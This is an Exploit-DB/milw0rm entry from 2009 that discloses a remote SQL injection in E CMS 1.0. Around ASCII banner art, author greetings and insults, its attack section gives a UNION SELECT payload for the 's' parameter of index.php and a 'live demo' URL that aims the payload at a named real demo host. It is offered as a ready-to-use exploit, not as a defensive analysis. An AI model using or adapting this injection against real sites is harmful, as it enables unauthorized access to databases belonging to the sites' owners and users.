E CMS 1.0 - 'index.php?s' SQL Injection

EDB-ID:

9461

CVE:

N/A


Platform:

PHP

Published:

2009-08-18

==============================================================================
                         ##  Hackteach.OrG ##
             
                      zZzZzZz                 zZzZzZz
                          Zz     ooooo            Zz    
                         Zz      o   o           Zz  
                        Zz       o   o          Zz 
                       Zz        o   o         Zz    
                      Zz         ooooo        Zz 
                     zZzZzZz                 zZzZzZz     
       
==============================================================================
        [»] ~ Note : Hacker R0x Lamerz Sux !
==============================================================================
        [»]  E Cms <= 1.0 Remote SQL Injection Vulnerability
==============================================================================
    [»] my home:            [ Hackteach.org ]
    [»] Script:               [ E Cms 1.0]
    [»] Language:           [ PHP ]
    [»] Home:               [ http://cmsdemo.enterbt.hu ]
    [»] Founder:            [ Red-D3v1L < php-c0de@hotmail.com > ]
    [»] Gr44tz to:          [ All member Hackteach.org/cc And Str0ke :$ ]
    [»] Fuck To :           [ Anti-trust << Big Big Big Lamer << ]
#########################################################################
 
===[ Exploit SQL ]===  
    [»] Path/index.php?s=-10+union+select+version()--
    [»] L1v3 d3m0 : http://cmsdemo.enterbt.hu/html/index.php?s=-10+union+select+version()--

Author: Red-D3v1L <-

###########################################################################

# milw0rm.com [2009-08-18]